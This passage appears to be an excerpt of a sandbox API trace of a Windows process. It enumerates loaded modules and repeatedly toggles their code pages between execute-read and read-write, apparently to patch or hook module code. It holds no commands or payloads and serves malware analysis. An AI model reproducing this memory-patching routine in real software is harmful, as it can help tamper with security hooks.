NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.144] GetCurrentProcess () returned 0xffffffff [0132.144] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1180, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.144] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1184, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.145] GetCurrentProcess () returned 0xffffffff [0132.145] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1184, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.145] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1188, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.146] GetCurrentProcess () returned 0xffffffff [0132.146] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1188, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.146] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1190, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.147] GetCurrentProcess () returned 0xffffffff [0132.147] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1190, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.147] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc119c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.147] GetCurrentProcess () returned 0xffffffff [0132.151] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc119c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.151] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.153] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc10b8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.153] GetCurrentProcess () returned 0xffffffff [0132.153] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc10b8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.154] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc10f4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.154] GetCurrentProcess () returned 0xffffffff [0132.154] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc10f4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.154] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1100, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.155] GetCurrentProcess () returned 0xffffffff [0132.155] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1100, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.155] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc111c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.156] GetCurrentProcess () returned 0xffffffff [0132.156] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc111c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.156] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1128, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.157] GetCurrentProcess () returned 0xffffffff [0132.157] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1128, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.157] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc122c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.157] GetCurrentProcess () returned 0xffffffff [0132.157] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc122c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.158] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1244, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.158] GetCurrentProcess () returned 0xffffffff [0132.158] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1244, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.158] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.160] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41520, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.160] GetCurrentProcess () returned 0xffffffff [0132.160] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41520, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.161] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41540, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.161] GetCurrentProcess () returned 0xffffffff [0132.161] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41540, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.161] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4175c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.162] GetCurrentProcess () returned 0xffffffff [0132.162] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4175c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.162] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41768, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.163] GetCurrentProcess () returned 0xffffffff [0132.163] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41768, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.163] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4176c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.179] GetCurrentProcess () returned 0xffffffff [0132.179] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4176c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.181] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417b8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.181] GetCurrentProcess () returned 0xffffffff [0132.182] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417b8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.182] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.182] GetCurrentProcess () returned 0xffffffff [0132.182] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.183] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417c0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.183] GetCurrentProcess () returned 0xffffffff [0132.183] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417c0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.183] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417c8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.184] GetCurrentProcess () returned 0xffffffff [0132.184] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417c8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.184] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417d0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.185] GetCurrentProcess () returned 0xffffffff [0132.185] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417d0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.185] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417f0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.185] GetCurrentProcess () returned 0xffffffff [0132.185] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417f0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.186] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4180c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.186] GetCurrentProcess () returned 0xffffffff [0132.186] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4180c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.186] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4182c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.187] GetCurrentProcess () returned 0xffffffff [0132.187] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4182c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.187] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41850, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.188] GetCurrentProcess () returned 0xffffffff [0132.188] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41850, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.188] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41860, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.189] GetCurrentProcess () returned 0xffffffff [0132.189] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41860, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.189] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41864, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.189] GetCurrentProcess () returned 0xffffffff [0132.190] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41864, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.190] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41868, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.190] GetCurrentProcess () returned 0xffffffff [0132.190] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41868, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.191] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4186c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.191] GetCurrentProcess () returned 0xffffffff [0132.191] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4186c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.192] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41870, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.192] GetCurrentProcess () returned 0xffffffff [0132.192] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41870, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.193] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.194] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7596101c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.195] GetCurrentProcess () returned 0xffffffff [0132.195] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7596101c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.195] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75961074, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.195] GetCurrentProcess () returned 0xffffffff [0132.195] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75961074, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.196] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75961088, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.196] GetCurrentProcess () returned 0xffffffff [0132.196] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75961088, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75961000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.197] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.199] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0208, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.199] GetCurrentProcess () returned 0xffffffff [0132.199] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0208, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.200] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0218, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.200] GetCurrentProcess () returned 0xffffffff [0132.200] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0218, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.201] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0328, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.201] GetCurrentProcess () returned 0xffffffff [0132.201] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0328, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.202] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0330, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.202] GetCurrentProcess () returned 0xffffffff [0132.202] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x774f0330, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x774f0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.203] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.204] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, 